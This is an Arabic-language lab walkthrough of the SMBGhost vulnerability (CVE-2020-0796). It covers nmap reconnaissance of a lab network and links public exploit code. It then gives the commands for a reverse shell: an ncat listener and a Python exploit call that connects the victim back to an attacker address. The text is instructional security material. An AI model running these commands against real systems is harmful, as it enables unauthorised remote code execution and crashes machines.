
استغلال إثبات المفهوم لثغرة CVE-2020-0796 (SMBGhost) يستهدف Windows 10/Server SMBv3.1.1. يتضمن استطلاع Nmap، وفحص الثغرات، وتوصيل حمولة شل عكسية.
**- الإصدارات المتأثرة*
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows Server, version 1903 (Server Core installation)
- Windows Server, version 1909 (Server Core installation)

تشغيل Nmap لمسح نطاق الشبكة في منطقة DMZ
map -sS 192.168.116.0/24
nmap: هو اسم برنامج مسح الشبكة**.
-sS: يختار طريقة مسح TCP SYN scan. في هذا المسح، يرسل Nmap حزمة SYN إلى الجهاز الهدف ويراقب الرد. إذا رد الجهاز الهدف بحزمة SYN-ACK، يعرف Nmap أن المنفذ مفتوح. إذا رد الجهاز الهدف بحزمة RST، فهذا يعني أن المنفذ مغلق.
192.168.116.0/24: عنوان IP أو نطاق عناوين IP محدد تريد مسحه. في هذه الحالة، النطاق هو 192.168.116.0/24، ويصف جميع عناوين IP من 192.168.116.1 إلى 192.168.116.254.

=> يُلاحظ أن عنوان IP للجهاز الضحية 192.168.116.145 لديه المنفذ 445 مفتوحًا.
· استخدام Nmap لمسح الثغرات على الجهاز الضحية
map -p445 –script smb-protocols 192.168.116.145
nmap: هو اسم برنامج مسح الشبكة.
-p445: يحدد المنفذ المحدد للمسح، في هذه الحالة المنفذ 445. يستخدم المنفذ 445 عادة للاتصال بخدمة SMB (Server Message Block) على أنظمة Windows.
--script smb-protocols: يختار السكربت (script) smb-protocols لإجراء المسح. يساعد هذا السكربت في فحص وعرض معلومات حول إصدارات بروتوكول SMB المدعومة على الجهاز الهدف.
192.168.116.145: عنوان IP للجهاز الذي تريد مسحه. في هذه الحالة، عنوان IP مضبوط على 192.168.116.145

النتيجة التي تم الحصول عليها smb-protocols تشير إلى أن الجهاز الضحية قد يحتوي على ثغرة قابلة للاستغلال SMBv3.1.1
لمزيد من التأكد، استمر في التحقق من إمكانية استغلال ثغرة CVE-2020-0796 عن طريق تشغيل سكربت بايثون
[]: -https://github.com/ly4k/SMBGhost "كود الاستغلال"

=> النتيجة Vulnerable -> تم اكتشاف ثغرة CVE-2020-0796 قابلة للاستغلال على الجهاز الضحية.
تنفيذ هجوم Reverse_shell
ncat -lvp 4444
[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "كود الاستغلال"
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

=> النتيجة: الجهاز المهاجم يمتلك صلاحية تنفيذ كود شيل على الجهاز الضحية.

بعد نجاح الاتصال، يمكن للمهاجم استغلال وتنفيذ أي كود على الجهاز الضحية بصلاحيات المستخدم في جلسة الاتصال.
عند انتهاء الجلسة، يصاب الجهاز الضحية بخطأ شاشة زرقاء (BlueScreen) ويعيد التشغيل تلقائيًا.

*قد يؤدي تنفيذ الاستغلال إلى تلف النظام المستهدف*